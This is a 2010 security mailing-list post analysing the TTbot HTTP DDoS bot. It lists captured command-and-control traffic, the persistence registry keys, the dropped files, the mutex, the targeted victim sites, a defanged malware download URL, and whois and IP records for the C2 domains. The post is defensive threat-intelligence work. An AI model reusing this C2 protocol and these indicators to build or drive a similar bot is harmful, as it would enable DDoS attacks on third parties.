[nsp-sec] TTbot DDoS bot analysis
jose nazario
jose at arbor.net
Sat Mar 20 12:55:58 EDT 2010
------[ SUMMARY
spotted this in our zoo this morning, another HTTP DDoS bot.
identifying mark: User-Agent: TT-Bot 1.0.0 in the client requests.
i have no idea if this is a kit, this one appears to be in limited
use. i have not explored the server-side of it.
we are tracking this.
-----[ HTTP COMMUNICATIONS
communications are two stage. the first stage is registration, where
the bot gets its ID:
| POST /register.php HTTP/1.1
| Host: panel.ntpupdatedomain.com
| User-Agent: TT-Bot 1.0.0
| Content-Type: application/x-www-form-urlencoded
| Content-Length: 71
|
ccode
=US&nat=1&os=5.1&owner=1&pcname=[Hostname]&username=[Username]&version=1
| 00
| HTTP/1.1 200 OK
| Server: nginx/0.7.64
| Date: Thu, 18 Mar 2010 02:30:05 GMT
| Content-Type: text/html
| Transfer-Encoding: chunked
| Connection: keep-alive
| X-Powered-By: PHP/5.2.6-1+lenny4
| Set-Cookie: PHPSESSID=170b66d3e291e99e27f5441b2b5d935a; path=/
| Expires: Thu, 19 Nov 1981 08:52:00 GMT
| Cache-Control: no-store, no-cache, must-revalidate, post-
check=0,
| pre-check=0
| Pragma: no-cache
| 28
| \t\t\t<R><id>17465</id></R><I><c>45</c></I>
| 0
this ID is then used to get the command from the botnet:
| POST /command.php HTTP/1.1
| Host: panel.ntpupdatedomain.com
| User-Agent: TT-Bot 1.0.0
| Content-Type: application/x-www-form-urlencoded
| Content-Length: 8
| id=17465
| HTTP/1.1 200 OK
| Server: nginx/0.7.64
| Date: Thu, 18 Mar 2010 02:30:50 GMT
| Content-Type: text/html
| Transfer-Encoding: chunked
| Connection: keep-alive
| X-Powered-By: PHP/5.2.6-1+lenny4
| Set-Cookie: PHPSESSID=c88dea160e6476d2c312d1b2e27ca4d1; path=/
| Expires: Thu, 19 Nov 1981 08:52:00 GMT
| Cache-Control: no-store, no-cache, must-revalidate, post-
check=0,
| pre-check=0
| Pragma: no-cache
| 68
| \t\t\t<C><id>487</id><m>4</m><c>3</
c><p0>www.dollaropoker.com</p0><p1
| >80</p1><p2>9</p2></C><I><c>60</c></I>
| 0
in this case the bot is told to DDoS (HTTP flood) www.dollaropoker.com.
--------[ MALCODE BEHAVIORS ON HOST
static analysis suggests that it's written in MS VB 6.
drops and then deletes: C:\Documents and Settings\[Username]
\Application Data\ctfmon.exe
drops and then deletes: C:\Documents and Settings\[Username]
\Application Data\svchost.exe
Mutex: dsbfjdagr4523
It wouldn't be a bot with some registry sets:
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
\Systemhost:
C:\\Documents and Settings\\[Username]\\Application Data\\ctfmon.exe
HKEY_CURRENT_USER\\Console\FL_Steam:
[REG_DWORD, value: 00000001]
HKEY_CURRENT_USER\\Console\ID:
[REG_DWORD, value: 000000E1]
HKEY_CURRENT_USER\\Console\SECSERVER:
connect.tt-bot.com
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
\Systemhost:
C:\\Documents and Settings\\[Username]\\Application Data\\ctfmon.exe
HKEY_CURRENT_USER\\Console\ID:
[REG_DWORD, value: 00000022]
HKEY_CURRENT_USER\\Console\SECSERVER:
p.tt-bot.com
-----[ DDOS ACTIVITY SEEN SO FAR
victims seen DDoSed so far:
http://www.hydrodreams.ch/
http:///www.dollaropoker.com/
he's also told the bots (in the past) to downoad:
hxxp://knechtstyle.funpic.de/v52.exe
------[ DOMAIN NAMES
sadly two of the domains are privacy protected BUT they look shady as
hell. ttbot.net, tt-bot.com and tt-bot.ru have been used (seen in
registry keys):
[whois.PublicDomainRegistry.com]
Registration Service Provider:
LovingName.com - E-Gold Domain Registration
Accept Liberty Reserve, e-Bullion, E-Gold, PayPal, MoneyBookers,
WebMoney, Pecunix
Domain Name: TT-BOT.COM
Registrant:
PrivacyProtect.org
Domain Admin (contact at privacyprotect.org)
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676
Creation Date: 03-Oct-2009
Expiration Date: 03-Oct-2010
Domain servers in listed order:
ns2.2x4hosting.ru
ns1.2x4hosting.ru
Domain Name: ttbot.net
Registrar: Name.com LLC
Protected Domain Services Customer ID: NCR-1191739
Expiration Date: 2010-11-19 12:50:35
Creation Date: 2009-11-19 12:50:35
Name Servers:
NS1.NAME.COM
NS2.NAME.COM
NS3.NAME.COM
NS4.NAME.COM
REGISTRANT CONTACT INFO
Protected Domain Services - Customer ID: NCR-1191739
125 Rampart Way
Suite 300
Denver
CO
80230
US
Phone: +1.7202492374
Email Address: ttbot.net at protecteddomainservices.com
[whois.ripn.net]
% By submitting a query to RIPN's Whois Service
% you agree to abide by the following terms of use:
% http://www.ripn.net/about/servpol.html#3.2 (in Russian)
% http://www.ripn.net/about/en/servpol.html#3.2 (in English).
domain: TT-BOT.RU
nserver: ns1.everydns.net.
nserver: ns2.everydns.net.
nserver: ns3.everydns.net.
nserver: ns4.everydns.net.
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private person
phone: +7 4957564482
e-mail: mail at sunfighter.us
registrar: REGTIME-REG-RIPN
created: 2009.10.07
paid-till: 2010.10.07
source: TCI
Last updated on 2010.03.18 16:24:00 MSK/MSD
--------[ KNOWN CnCs
http://connect.tt-bot.ru/command.php
connect.tt-bot.com has address 92.241.169.250
AS | IP | AS Name
41947 | 92.241.169.250 | WEBALTA-AS Wahome networks
http://panel.ntpupdatedomain.com/command.php
panel.ntpupdatedomain.com. 800 IN A 92.241.165.161
AS | IP | AS Name
41947 | 92.241.165.161 | WEBALTA-AS Wahome networks
------[ HOSTNAMES REFERENCED
hostnames referenced in the bot's registry:
panel.tt-bot.ru is an alias for panel.vps100.tt-bot.ru.
panel.vps100.tt-bot.ru is an alias for vps100.ttbot.net.
vps100.ttbot.net has address 217.23.5.100
connect.tt-bot.com has address 92.241.169.250
p.tt-bot.com has address 92.241.169.250
AS | IP | AS Name
49981 | 217.23.5.100 | WORLDSTREAM WorldStream
41947 | 92.241.169.250 | WEBALTA-AS Wahome networks
_____________________________
jose nazario, ph.d. jose at arbor.net
sr. manager of security research, arbor networks
http://asert.arbor.net/
More information about the nsp-security
mailing list